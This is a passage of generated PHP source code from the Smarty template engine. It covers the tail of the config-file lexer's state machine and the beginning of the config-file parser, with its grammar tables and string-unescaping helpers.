    public $value;

    /**
     * current line
     *
     * @var int
     */
    public $line;

    /**
     * state number
     *
     * @var int
     */
    public $state = 1;

    /**
     * Smarty object
     *
     * @var Smarty
     */
    public $smarty = null;

    /**
     * trace file
     *
     * @var resource
     */
    public $yyTraceFILE;

    /**
     * trace prompt
     *
     * @var string
     */
    public $yyTracePrompt;

    /**
     * state names
     *
     * @var array
     */
    public $state_name = array(
        1 => 'START', 2 => 'VALUE', 3 => 'NAKED_STRING_VALUE', 4 => 'COMMENT', 5 => 'SECTION', 6 => 'TRIPPLE'
    );

    /**
     * token names
     *
     * @var array
     */
    public $smarty_token_names = array(        // Text for parser error messages
    );

    /**
     * compiler object
     *
     * @var Smarty_Internal_Config_File_Compiler
     */
    private $compiler = null;

    /**
     * copy of config_booleanize
     *
     * @var bool
     */
    private $configBooleanize = false;

    /**
     * storage for assembled token patterns
     *
     * @var string
     */
    private $yy_global_pattern1 = null;

    private $yy_global_pattern2 = null;

    private $yy_global_pattern3 = null;

    private $yy_global_pattern4 = null;

    private $yy_global_pattern5 = null;

    private $yy_global_pattern6 = null;

    private $_yy_state          = 1;

    private $_yy_stack          = array();

    /**
     * constructor
     *
     * @param   string                             $data template source
     * @param Smarty_Internal_Config_File_Compiler $compiler
     */
    public function __construct($data, Smarty_Internal_Config_File_Compiler $compiler)
    {
        $this->data = $data . "\n"; //now all lines are \n-terminated
        $this->dataLength = strlen($data);
        $this->counter = 0;
        if (preg_match('/^\xEF\xBB\xBF/', $this->data, $match)) {
            $this->counter += strlen($match[ 0 ]);
        }
        $this->line = 1;
        $this->compiler = $compiler;
        $this->smarty = $compiler->smarty;
        $this->configBooleanize = $this->smarty->config_booleanize;
    }

    public function replace($input)
    {
        return $input;
    } // end function

    public function PrintTrace()
    {
        $this->yyTraceFILE = fopen('php://output', 'w');
        $this->yyTracePrompt = '<br>';
    }

    public function yylex()
    {
        return $this->{'yylex' . $this->_yy_state}();
    }

    public function yypushstate($state)
    {
        if ($this->yyTraceFILE) {
            fprintf(
                $this->yyTraceFILE,
                "%sState push %s\n",
                $this->yyTracePrompt,
                isset($this->state_name[ $this->_yy_state ]) ? $this->state_name[ $this->_yy_state ] : $this->_yy_state
            );
        }
        array_push($this->_yy_stack, $this->_yy_state);
        $this->_yy_state = $state;
        if ($this->yyTraceFILE) {
            fprintf(
                $this->yyTraceFILE,
                "%snew State %s\n",
                $this->yyTracePrompt,
                isset($this->state_name[ $this->_yy_state ]) ? $this->state_name[ $this->_yy_state ] : $this->_yy_state
            );
        }
    }

    public function yypopstate()
    {
        if ($this->yyTraceFILE) {
            fprintf(
                $this->yyTraceFILE,
                "%sState pop %s\n",
                $this->yyTracePrompt,
                isset($this->state_name[ $this->_yy_state ]) ? $this->state_name[ $this->_yy_state ] : $this->_yy_state
            );
        }
        $this->_yy_state = array_pop($this->_yy_stack);
        if ($this->yyTraceFILE) {
            fprintf(
                $this->yyTraceFILE,
                "%snew State %s\n",
                $this->yyTracePrompt,
                isset($this->state_name[ $this->_yy_state ]) ? $this->state_name[ $this->_yy_state ] : $this->_yy_state
            );
        }
    }

    public function yybegin($state)
    {
        $this->_yy_state = $state;
        if ($this->yyTraceFILE) {
            fprintf(
                $this->yyTraceFILE,
                "%sState set %s\n",
                $this->yyTracePrompt,
                isset($this->state_name[ $this->_yy_state ]) ? $this->state_name[ $this->_yy_state ] : $this->_yy_state
            );
        }
    }

    public function yylex1()
    {
        if (!isset($this->yy_global_pattern1)) {
            $this->yy_global_pattern1 =
                $this->replace("/\G(#|;)|\G(\\[)|\G(\\])|\G(=)|\G([ \t\r]+)|\G(\n)|\G([0-9]*[a-zA-Z_]\\w*)|\G([\S\s])/isS");
        }
        if (!isset($this->dataLength)) {
            $this->dataLength = strlen($this->data);
        }
        if ($this->counter >= $this->dataLength) {
            return false; // end of input
        }
        do {
            if (preg_match($this->yy_global_pattern1, $this->data, $yymatches, 0, $this->counter)) {
                if (!isset($yymatches[ 0 ][ 1 ])) {
                    $yymatches = preg_grep("/(.|\s)+/", $yymatches);
                } else {
                    $yymatches = array_filter($yymatches);
                }
                if (empty($yymatches)) {
                    throw new Exception('Error: lexing failed because a rule matched' .
                                        ' an empty string.  Input "' . substr(
                                            $this->data,
                                            $this->counter,
                                            5
                                        ) . '... state START');
                }
                next($yymatches); // skip global match
                $this->token = key($yymatches); // token number
                $this->value = current($yymatches); // token value
                $r = $this->{'yy_r1_' . $this->token}();
                if ($r === null) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    // accept this token
                    return true;
                } elseif ($r === true) {
                    // we have changed state
                    // process this token in the new state
                    return $this->yylex();
                } elseif ($r === false) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    if ($this->counter >= $this->dataLength) {
                        return false; // end of input
                    }
                    // skip this token
                    continue;
                }
            } else {
                throw new Exception('Unexpected input at line' . $this->line .
                                    ': ' . $this->data[ $this->counter ]);
            }
            break;
        } while (true);
    }

    public function yy_r1_1()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_COMMENTSTART;
        $this->yypushstate(self::COMMENT);
    }

    public function yy_r1_2()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_OPENB;
        $this->yypushstate(self::SECTION);
    }

    public function yy_r1_3()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_CLOSEB;
    }

    public function yy_r1_4()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_EQUAL;
        $this->yypushstate(self::VALUE);
    } // end function

    public function yy_r1_5()
    {
        return false;
    }

    public function yy_r1_6()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_NEWLINE;
    }

    public function yy_r1_7()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_ID;
    }

    public function yy_r1_8()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_OTHER;
    }

    public function yylex2()
    {
        if (!isset($this->yy_global_pattern2)) {
            $this->yy_global_pattern2 =
                $this->replace("/\G([ \t\r]+)|\G(\\d+\\.\\d+(?=[ \t\r]*[\n#;]))|\G(\\d+(?=[ \t\r]*[\n#;]))|\G(\"\"\")|\G('[^'\\\\]*(?:\\\\.[^'\\\\]*)*'(?=[ \t\r]*[\n#;]))|\G(\"[^\"\\\\]*(?:\\\\.[^\"\\\\]*)*\"(?=[ \t\r]*[\n#;]))|\G([a-zA-Z]+(?=[ \t\r]*[\n#;]))|\G([^\n]+?(?=[ \t\r]*\n))|\G(\n)/isS");
        }
        if (!isset($this->dataLength)) {
            $this->dataLength = strlen($this->data);
        }
        if ($this->counter >= $this->dataLength) {
            return false; // end of input
        }
        do {
            if (preg_match($this->yy_global_pattern2, $this->data, $yymatches, 0, $this->counter)) {
                if (!isset($yymatches[ 0 ][ 1 ])) {
                    $yymatches = preg_grep("/(.|\s)+/", $yymatches);
                } else {
                    $yymatches = array_filter($yymatches);
                }
                if (empty($yymatches)) {
                    throw new Exception('Error: lexing failed because a rule matched' .
                                        ' an empty string.  Input "' . substr(
                                            $this->data,
                                            $this->counter,
                                            5
                                        ) . '... state VALUE');
                }
                next($yymatches); // skip global match
                $this->token = key($yymatches); // token number
                $this->value = current($yymatches); // token value
                $r = $this->{'yy_r2_' . $this->token}();
                if ($r === null) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    // accept this token
                    return true;
                } elseif ($r === true) {
                    // we have changed state
                    // process this token in the new state
                    return $this->yylex();
                } elseif ($r === false) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    if ($this->counter >= $this->dataLength) {
                        return false; // end of input
                    }
                    // skip this token
                    continue;
                }
            } else {
                throw new Exception('Unexpected input at line' . $this->line .
                                    ': ' . $this->data[ $this->counter ]);
            }
            break;
        } while (true);
    }

    public function yy_r2_1()
    {
        return false;
    }

    public function yy_r2_2()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_FLOAT;
        $this->yypopstate();
    }

    public function yy_r2_3()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_INT;
        $this->yypopstate();
    }

    public function yy_r2_4()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_TRIPPLE_QUOTES;
        $this->yypushstate(self::TRIPPLE);
    }

    public function yy_r2_5()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_SINGLE_QUOTED_STRING;
        $this->yypopstate();
    }

    public function yy_r2_6()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_DOUBLE_QUOTED_STRING;
        $this->yypopstate();
    } // end function

    public function yy_r2_7()
    {
        if (!$this->configBooleanize ||
            !in_array(strtolower($this->value), array('true', 'false', 'on', 'off', 'yes', 'no'))) {
            $this->yypopstate();
            $this->yypushstate(self::NAKED_STRING_VALUE);
            return true; //reprocess in new state
        } else {
            $this->token = Smarty_Internal_Configfileparser::TPC_BOOL;
            $this->yypopstate();
        }
    }

    public function yy_r2_8()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_NAKED_STRING;
        $this->yypopstate();
    }

    public function yy_r2_9()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_NAKED_STRING;
        $this->value = '';
        $this->yypopstate();
    } // end function

    public function yylex3()
    {
        if (!isset($this->yy_global_pattern3)) {
            $this->yy_global_pattern3 = $this->replace("/\G([^\n]+?(?=[ \t\r]*\n))/isS");
        }
        if (!isset($this->dataLength)) {
            $this->dataLength = strlen($this->data);
        }
        if ($this->counter >= $this->dataLength) {
            return false; // end of input
        }
        do {
            if (preg_match($this->yy_global_pattern3, $this->data, $yymatches, 0, $this->counter)) {
                if (!isset($yymatches[ 0 ][ 1 ])) {
                    $yymatches = preg_grep("/(.|\s)+/", $yymatches);
                } else {
                    $yymatches = array_filter($yymatches);
                }
                if (empty($yymatches)) {
                    throw new Exception('Error: lexing failed because a rule matched' .
                                        ' an empty string.  Input "' . substr(
                                            $this->data,
                                            $this->counter,
                                            5
                                        ) . '... state NAKED_STRING_VALUE');
                }
                next($yymatches); // skip global match
                $this->token = key($yymatches); // token number
                $this->value = current($yymatches); // token value
                $r = $this->{'yy_r3_' . $this->token}();
                if ($r === null) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    // accept this token
                    return true;
                } elseif ($r === true) {
                    // we have changed state
                    // process this token in the new state
                    return $this->yylex();
                } elseif ($r === false) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    if ($this->counter >= $this->dataLength) {
                        return false; // end of input
                    }
                    // skip this token
                    continue;
                }
            } else {
                throw new Exception('Unexpected input at line' . $this->line .
                                    ': ' . $this->data[ $this->counter ]);
            }
            break;
        } while (true);
    }

    public function yy_r3_1()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_NAKED_STRING;
        $this->yypopstate();
    }

    public function yylex4()
    {
        if (!isset($this->yy_global_pattern4)) {
            $this->yy_global_pattern4 = $this->replace("/\G([ \t\r]+)|\G([^\n]+?(?=[ \t\r]*\n))|\G(\n)/isS");
        }
        if (!isset($this->dataLength)) {
            $this->dataLength = strlen($this->data);
        }
        if ($this->counter >= $this->dataLength) {
            return false; // end of input
        }
        do {
            if (preg_match($this->yy_global_pattern4, $this->data, $yymatches, 0, $this->counter)) {
                if (!isset($yymatches[ 0 ][ 1 ])) {
                    $yymatches = preg_grep("/(.|\s)+/", $yymatches);
                } else {
                    $yymatches = array_filter($yymatches);
                }
                if (empty($yymatches)) {
                    throw new Exception('Error: lexing failed because a rule matched' .
                                        ' an empty string.  Input "' . substr(
                                            $this->data,
                                            $this->counter,
                                            5
                                        ) . '... state COMMENT');
                }
                next($yymatches); // skip global match
                $this->token = key($yymatches); // token number
                $this->value = current($yymatches); // token value
                $r = $this->{'yy_r4_' . $this->token}();
                if ($r === null) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    // accept this token
                    return true;
                } elseif ($r === true) {
                    // we have changed state
                    // process this token in the new state
                    return $this->yylex();
                } elseif ($r === false) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    if ($this->counter >= $this->dataLength) {
                        return false; // end of input
                    }
                    // skip this token
                    continue;
                }
            } else {
                throw new Exception('Unexpected input at line' . $this->line .
                                    ': ' . $this->data[ $this->counter ]);
            }
            break;
        } while (true);
    }

    public function yy_r4_1()
    {
        return false;
    }

    public function yy_r4_2()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_NAKED_STRING;
    } // end function

    public function yy_r4_3()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_NEWLINE;
        $this->yypopstate();
    }

    public function yylex5()
    {
        if (!isset($this->yy_global_pattern5)) {
            $this->yy_global_pattern5 = $this->replace("/\G(\\.)|\G(.*?(?=[\.=[\]\r\n]))/isS");
        }
        if (!isset($this->dataLength)) {
            $this->dataLength = strlen($this->data);
        }
        if ($this->counter >= $this->dataLength) {
            return false; // end of input
        }
        do {
            if (preg_match($this->yy_global_pattern5, $this->data, $yymatches, 0, $this->counter)) {
                if (!isset($yymatches[ 0 ][ 1 ])) {
                    $yymatches = preg_grep("/(.|\s)+/", $yymatches);
                } else {
                    $yymatches = array_filter($yymatches);
                }
                if (empty($yymatches)) {
                    throw new Exception('Error: lexing failed because a rule matched' .
                                        ' an empty string.  Input "' . substr(
                                            $this->data,
                                            $this->counter,
                                            5
                                        ) . '... state SECTION');
                }
                next($yymatches); // skip global match
                $this->token = key($yymatches); // token number
                $this->value = current($yymatches); // token value
                $r = $this->{'yy_r5_' . $this->token}();
                if ($r === null) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    // accept this token
                    return true;
                } elseif ($r === true) {
                    // we have changed state
                    // process this token in the new state
                    return $this->yylex();
                } elseif ($r === false) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    if ($this->counter >= $this->dataLength) {
                        return false; // end of input
                    }
                    // skip this token
                    continue;
                }
            } else {
                throw new Exception('Unexpected input at line' . $this->line .
                                    ': ' . $this->data[ $this->counter ]);
            }
            break;
        } while (true);
    }

    public function yy_r5_1()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_DOT;
    }

    public function yy_r5_2()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_SECTION;
        $this->yypopstate();
    } // end function

    public function yylex6()
    {
        if (!isset($this->yy_global_pattern6)) {
            $this->yy_global_pattern6 = $this->replace("/\G(\"\"\"(?=[ \t\r]*[\n#;]))|\G([\S\s])/isS");
        }
        if (!isset($this->dataLength)) {
            $this->dataLength = strlen($this->data);
        }
        if ($this->counter >= $this->dataLength) {
            return false; // end of input
        }
        do {
            if (preg_match($this->yy_global_pattern6, $this->data, $yymatches, 0, $this->counter)) {
                if (!isset($yymatches[ 0 ][ 1 ])) {
                    $yymatches = preg_grep("/(.|\s)+/", $yymatches);
                } else {
                    $yymatches = array_filter($yymatches);
                }
                if (empty($yymatches)) {
                    throw new Exception('Error: lexing failed because a rule matched' .
                                        ' an empty string.  Input "' . substr(
                                            $this->data,
                                            $this->counter,
                                            5
                                        ) . '... state TRIPPLE');
                }
                next($yymatches); // skip global match
                $this->token = key($yymatches); // token number
                $this->value = current($yymatches); // token value
                $r = $this->{'yy_r6_' . $this->token}();
                if ($r === null) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    // accept this token
                    return true;
                } elseif ($r === true) {
                    // we have changed state
                    // process this token in the new state
                    return $this->yylex();
                } elseif ($r === false) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    if ($this->counter >= $this->dataLength) {
                        return false; // end of input
                    }
                    // skip this token
                    continue;
                }
            } else {
                throw new Exception('Unexpected input at line' . $this->line .
                                    ': ' . $this->data[ $this->counter ]);
            }
            break;
        } while (true);
    }

    public function yy_r6_1()
    {
        $this->token = Smarty_Internal_Configfileparser::TPC_TRIPPLE_QUOTES_END;
        $this->yypopstate();
        $this->yypushstate(self::START);
    }

    public function yy_r6_2()
    {
        $to = strlen($this->data);
        preg_match("/\"\"\"[ \t\r]*[\n#;]/", $this->data, $match, PREG_OFFSET_CAPTURE, $this->counter);
        if (isset($match[ 0 ][ 1 ])) {
            $to = $match[ 0 ][ 1 ];
        } else {
            $this->compiler->trigger_config_file_error('missing or misspelled literal closing tag');
        }
        $this->value = substr($this->data, $this->counter, $to - $this->counter);
        $this->token = Smarty_Internal_Configfileparser::TPC_TRIPPLE_TEXT;
    }
}
<?php

class TPC_yyStackEntry
{
    public $stateno;       /* The state-number */
    public $major;         /* The major token value.  This is the code
                     ** number for the token at this stack level */
    public $minor; /* The user-supplied minor token value.  This
                     ** is the value of the token  */
}

// line 12 "../smarty/lexer/smarty_internal_configfileparser.y"

/**
 * Smarty Internal Plugin Configfileparse
 *
 * This is the config file parser.
 * It is generated from the smarty_internal_configfileparser.y file
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */
class Smarty_Internal_Configfileparser
{
    // line 25 "../smarty/lexer/smarty_internal_configfileparser.y"
    const TPC_OPENB                = 1;
    const TPC_SECTION              = 2;
    const TPC_CLOSEB               = 3;
    const TPC_DOT                  = 4;
    const TPC_ID                   = 5;
    const TPC_EQUAL                = 6;
    const TPC_FLOAT                = 7;
    const TPC_INT                  = 8;
    const TPC_BOOL                 = 9;
    const TPC_SINGLE_QUOTED_STRING = 10;
    const TPC_DOUBLE_QUOTED_STRING = 11;
    const TPC_TRIPPLE_QUOTES       = 12;
    const TPC_TRIPPLE_TEXT         = 13;
    const TPC_TRIPPLE_QUOTES_END   = 14;
    const TPC_NAKED_STRING         = 15;
    const TPC_OTHER                = 16;
    const TPC_NEWLINE              = 17;
    const TPC_COMMENTSTART         = 18;
    const YY_NO_ACTION             = 60;
    const YY_ACCEPT_ACTION         = 59;
    const YY_ERROR_ACTION          = 58;
    const YY_SZ_ACTTAB             = 38;
    const YY_SHIFT_USE_DFLT        = -8;
    const YY_SHIFT_MAX             = 19;
    const YY_REDUCE_USE_DFLT       = -17;
    const YY_REDUCE_MAX            = 10;
    const YYNOCODE                 = 29;
    const YYSTACKDEPTH             = 100;
    const YYNSTATE                 = 36;
    const YYNRULE                  = 22;
    const YYERRORSYMBOL            = 19;
    const YYERRSYMDT               = 'yy0';
    const YYFALLBACK               = 0;

    public static $yy_action        = array(
        32, 31, 30, 29, 35, 13, 19, 3, 24, 26,
        59, 9, 14, 1, 16, 25, 11, 28, 25, 11,
        17, 27, 34, 20, 18, 15, 23, 5, 6, 22,
        10, 8, 4, 12, 2, 33, 7, 21,
    );

    public static $yy_lookahead     = array(
        7, 8, 9, 10, 11, 12, 5, 23, 15, 16,
        20, 21, 2, 23, 4, 17, 18, 14, 17, 18,
        13, 14, 25, 26, 15, 2, 17, 3, 3, 17,
        25, 25, 6, 1, 23, 27, 22, 24,
    );

    public static $yy_shift_ofst    = array(
        -8, 1, 1, 1, -7, -2, -2, 32, -8, -8,
        -8, 9, 10, 7, 25, 24, 23, 3, 12, 26,
    );

    public static $yy_reduce_ofst   = array(
        -10, -3, -3, -3, 8, 6, 5, 13, 11, 14,
        -16,
    );

    public static $yyExpectedTokens = array(
        array(),
        array(5, 17, 18,),
        array(5, 17, 18,),
        array(5, 17, 18,),
        array(7, 8, 9, 10, 11, 12, 15, 16,),
        array(17, 18,),
        array(17, 18,),
        array(1,),
        array(),
        array(),
        array(),
        array(15, 17,),
        array(2, 4,),
        array(13, 14,),
        array(3,),
        array(3,),
        array(2,),
        array(14,),
        array(17,),
        array(6,),
        array(),
        array(),
        array(),
        array(),
        array(),
        array(),
        array(),
        array(),
        array(),
        array(),
        array(),
        array(),
        array(),
        array(),
        array(),
        array(),
    );

    public static $yy_default       = array(
        44, 37, 41, 40, 58, 58, 58, 36, 44, 39,
        44, 58, 58, 58, 58, 58, 58, 58, 58, 58,
        43, 38, 57, 56, 53, 55, 54, 52, 51, 49,
        48, 47, 46, 45, 42, 50,
    );

    public static $yyFallback       = array();

    public static $yyRuleName       = array(
        'start ::= global_vars sections',
        'global_vars ::= var_list',
        'sections ::= sections section',
        'sections ::=',
        'section ::= OPENB SECTION CLOSEB newline var_list',
        'section ::= OPENB DOT SECTION CLOSEB newline var_list',
        'var_list ::= var_list newline',
        'var_list ::= var_list var',
        'var_list ::=',
        'var ::= ID EQUAL value',
        'value ::= FLOAT',
        'value ::= INT',
        'value ::= BOOL',
        'value ::= SINGLE_QUOTED_STRING',
        'value ::= DOUBLE_QUOTED_STRING',
        'value ::= TRIPPLE_QUOTES TRIPPLE_TEXT TRIPPLE_QUOTES_END',
        'value ::= TRIPPLE_QUOTES TRIPPLE_QUOTES_END',
        'value ::= NAKED_STRING',
        'value ::= OTHER',
        'newline ::= NEWLINE',
        'newline ::= COMMENTSTART NEWLINE',
        'newline ::= COMMENTSTART NAKED_STRING NEWLINE',
    );

    public static $yyRuleInfo       = array(
        array(0 => 20, 1 => 2),
        array(0 => 21, 1 => 1),
        array(0 => 22, 1 => 2),
        array(0 => 22, 1 => 0),
        array(0 => 24, 1 => 5),
        array(0 => 24, 1 => 6),
        array(0 => 23, 1 => 2),
        array(0 => 23, 1 => 2),
        array(0 => 23, 1 => 0),
        array(0 => 26, 1 => 3),
        array(0 => 27, 1 => 1),
        array(0 => 27, 1 => 1),
        array(0 => 27, 1 => 1),
        array(0 => 27, 1 => 1),
        array(0 => 27, 1 => 1),
        array(0 => 27, 1 => 3),
        array(0 => 27, 1 => 2),
        array(0 => 27, 1 => 1),
        array(0 => 27, 1 => 1),
        array(0 => 25, 1 => 1),
        array(0 => 25, 1 => 2),
        array(0 => 25, 1 => 3),
    );

    public static $yyReduceMap      = array(
        0  => 0,
        2  => 0,
        3  => 0,
        19 => 0,
        20 => 0,
        21 => 0,
        1  => 1,
        4  => 4,
        5  => 5,
        6  => 6,
        7  => 7,
        8  => 8,
        9  => 9,
        10 => 10,
        11 => 11,
        12 => 12,
        13 => 13,
        14 => 14,
        15 => 15,
        16 => 16,
        17 => 17,
        18 => 17,
    );

    /**
     * helper map
     *
     * @var array
     */
    private static $escapes_single = array(
        '\\' => '\\',
        '\'' => '\''
    );

    /**
     * result status
     *
     * @var bool
     */
    public $successful = true;

    /**
     * return value
     *
     * @var mixed
     */
    public $retvalue = 0;

    /**
     * @var
     */
    public $yymajor;

    /**
     * compiler object
     *
     * @var Smarty_Internal_Config_File_Compiler
     */
    public $compiler = null;

    /**
     * smarty object
     *
     * @var Smarty
     */
    public $smarty      = null;

    public $yyTraceFILE;

    public $yyTracePrompt;

    public $yyidx;

    public $yyerrcnt;

    public $yystack     = array();

    public $yyTokenName = array(
        '$', 'OPENB', 'SECTION', 'CLOSEB',
        'DOT', 'ID', 'EQUAL', 'FLOAT',
        'INT', 'BOOL', 'SINGLE_QUOTED_STRING', 'DOUBLE_QUOTED_STRING',
        'TRIPPLE_QUOTES', 'TRIPPLE_TEXT', 'TRIPPLE_QUOTES_END', 'NAKED_STRING',
        'OTHER', 'NEWLINE', 'COMMENTSTART', 'error',
        'start', 'global_vars', 'sections', 'var_list',
        'section', 'newline', 'var', 'value',
    );

    /**
     * lexer object
     *
     * @var Smarty_Internal_Configfilelexer
     */
    private $lex;

    /**
     * internal error flag
     *
     * @var bool
     */
    private $internalError = false;

    /**
     * copy of config_overwrite property
     *
     * @var bool
     */
    private $configOverwrite = false;

    /**
     * copy of config_read_hidden property
     *
     * @var bool
     */
    private $configReadHidden = false;

    private $_retvalue;

    /**
     * constructor
     *
     * @param Smarty_Internal_Configfilelexer      $lex
     * @param Smarty_Internal_Config_File_Compiler $compiler
     */
    public function __construct(Smarty_Internal_Configfilelexer $lex, Smarty_Internal_Config_File_Compiler $compiler)
    {
        $this->lex = $lex;
        $this->smarty = $compiler->smarty;
        $this->compiler = $compiler;
        $this->configOverwrite = $this->smarty->config_overwrite;
        $this->configReadHidden = $this->smarty->config_read_hidden;
    }

    public static function yy_destructor($yymajor, $yypminor)
    {
        switch ($yymajor) {
            default:
                break;   /* If no destructor action specified: do nothing */
        }
    }

    /**
     * parse single quoted string
     *  remove outer quotes
     *  unescape inner quotes
     *
     * @param string $qstr
     *
     * @return string
     */
    private static function parse_single_quoted_string($qstr)
    {
        $escaped_string = substr($qstr, 1, strlen($qstr) - 2); //remove outer quotes
        $ss = preg_split('/(\\\\.)/', $escaped_string, -1, PREG_SPLIT_DELIM_CAPTURE);
        $str = '';
        foreach ($ss as $s) {
            if (strlen($s) === 2 && $s[ 0 ] === '\\') {
                if (isset(self::$escapes_single[ $s[ 1 ] ])) {
                    $s = self::$escapes_single[ $s[ 1 ] ];
                }
            }
            $str .= $s;
        }
        return $str;
    }                    /* Index of top element in stack */
    /**
     * parse double quoted string
     *
     * @param string $qstr
     *
     * @return string
     */
    private static function parse_double_quoted_string($qstr)
    {
        $inner_str = substr($qstr, 1, strlen($qstr) - 2);
        return stripcslashes($inner_str);
    }                 /* Shifts left before out of the error */
    /**
     * parse triple quoted string
     *
     * @param string $qstr
     *
     * @return string
     */
    private static function parse_tripple_double_quoted_string($qstr)
    {
        return stripcslashes($qstr);
    }  /* The parser's stack */
    public function Trace($TraceFILE, $zTracePrompt)
    {
        if (!$TraceFILE) {
            $zTracePrompt = 0;
        } elseif (!$zTracePrompt) {
            $TraceFILE = 0;
        }
        $this->yyTraceFILE = $TraceFILE;
        $this->yyTracePrompt = $zTracePrompt;
    }

    public function PrintTrace()
    {
        $this->yyTraceFILE = fopen('php://output', 'w');
        $this->yyTracePrompt = '<br>';
    }

    public function tokenName($tokenType)
    {
        if ($tokenType === 0) {
            return 'End of Input';
        }
        if ($tokenType > 0 && $tokenType < count($this->yyTokenName)) {
            return $this->yyTokenName[ $tokenType ];
        } else {
            return 'Unknown';
        }
    }

    public function yy_pop_parser_stack()
    {
        if (empty($this->yystack)) {
            return;
        }
        $yytos = array_pop($this->yystack);
        if ($this->yyTraceFILE && $this->yyidx >= 0) {
            fwrite(
                $this->yyTraceFILE,
                $this->yyTracePrompt . 'Popping ' . $this->yyTokenName[ $yytos->major ] .
                "\n"
            );
        }
        $yymajor = $yytos->major;
        self::yy_destructor($yymajor, $yytos->minor);
        $this->yyidx--;
        return $yymajor;
    }

    public function __destruct()
    {
        while ($this->yystack !== array()) {
            $this->yy_pop_parser_stack();
        }
        if (is_resource($this->yyTraceFILE)) {
            fclose($this->yyTraceFILE);
        }
    }

    public function yy_get_expected_tokens($token)
    {
        static $res3 = array();
        static $res4 = array();
        $state = $this->yystack[ $this->yyidx ]->stateno;
        $expected = self::$yyExpectedTokens[ $state ];
        if (isset($res3[ $state ][ $token ])) {
            if ($res3[ $state ][ $token ]) {
                return $expected;
            }
        } else {
            if ($res3[ $state ][ $token ] = in_array($token, self::$yyExpectedTokens[ $state ], true)) {
                return $expected;
            }
        }
        $stack = $this->yystack;
        $yyidx = $this->yyidx;
        do {
            $yyact = $this->yy_find_shift_action($token);
            if ($yyact >= self::YYNSTATE && $yyact < self::YYNSTATE + self::YYNRULE) {
                // reduce action
                $done = 0;
                do {
                    if ($done++ === 100) {
                        $this->yyidx = $yyidx;
                        $this->yystack = $stack;
                        // too much recursion prevents proper detection
                        // so give up
                        return array_unique($expected);
                    }
                    $yyruleno = $yyact - self::YYNSTATE;
                    $this->yyidx -= self::$yyRuleInfo[ $yyruleno ][ 1 ];
                    $nextstate = $this->yy_find_reduce_action(
                        $this->yystack[ $this->yyidx ]->stateno,
                        self::$yyRuleInfo[ $yyruleno ][ 0 ]
                    );
                    if (isset(self::$yyExpectedTokens[ $nextstate ])) {
                        $expected = array_merge($expected, self::$yyExpectedTokens[ $nextstate ]);
                        if (isset($res4[ $nextstate ][ $token ])) {
                            if ($res4[ $nextstate ][ $token ]) {
                                $this->yyidx = $yyidx;
                                $this->yystack = $stack;
                                return array_unique($expected);
                            }
                        } else {
                            if ($res4[ $nextstate ][ $token ] =
                                in_array($token, self::$yyExpectedTokens[ $nextstate ], true)) {
                                $this->yyidx = $yyidx;
                                $this->yystack = $stack;
                                return array_unique($expected);
                            }
                        }
                    }
                    if ($nextstate < self::YYNSTATE) {
                        // we need to shift a non-terminal
                        $this->yyidx++;
                        $x = new TPC_yyStackEntry;
                        $x->stateno = $nextstate;
                        $x->major = self::$yyRuleInfo[ $yyruleno ][ 0 ];
                        $this->yystack[ $this->yyidx ] = $x;
                        continue 2;
                    } elseif ($nextstate === self::YYNSTATE + self::YYNRULE + 1) {
                        $this->yyidx = $yyidx;
                        $this->yystack = $stack;
                        // the last token was just ignored, we can't accept
                        // by ignoring input, this is in essence ignoring a
                        // syntax error!
                        return array_unique($expected);
                    } elseif ($nextstate === self::YY_NO_ACTION) {
                        $this->yyidx = $yyidx;
                        $this->yystack = $stack;
                        // input accepted, but not shifted (I guess)
                        return $expected;
                    } else {
                        $yyact = $nextstate;
                    }
                } while (true);
            }
            break;
        } while (true);
        $this->yyidx = $yyidx;
        $this->yystack = $stack;
        return array_unique($expected);
    }

    public function yy_is_expected_token($token)
    {
        static $res = array();
        static $res2 = array();
        if ($token === 0) {
            return true; // 0 is not part of this
        }
        $state = $this->yystack[ $this->yyidx ]->stateno;
        if (isset($res[ $state ][ $token ])) {
            if ($res[ $state ][ $token ]) {
                return true;
            }
        } else {
            if ($res[ $state ][ $token ] = in_array($token, self::$yyExpectedTokens[ $state ], true)) {
                return true;
            }
        }
        $stack = $this->yystack;
        $yyidx = $this->yyidx;
        do {
            $yyact = $this->yy_find_shift_action($token);
            if ($yyact >= self::YYNSTATE && $yyact < self::YYNSTATE + self::YYNRULE) {
                // reduce action
                $done = 0;
                do {
                    if ($done++ === 100) {
                        $this->yyidx = $yyidx;
                        $this->yystack = $stack;
                        // too much recursion prevents proper detection
                        // so give up
                        return true;
                    }
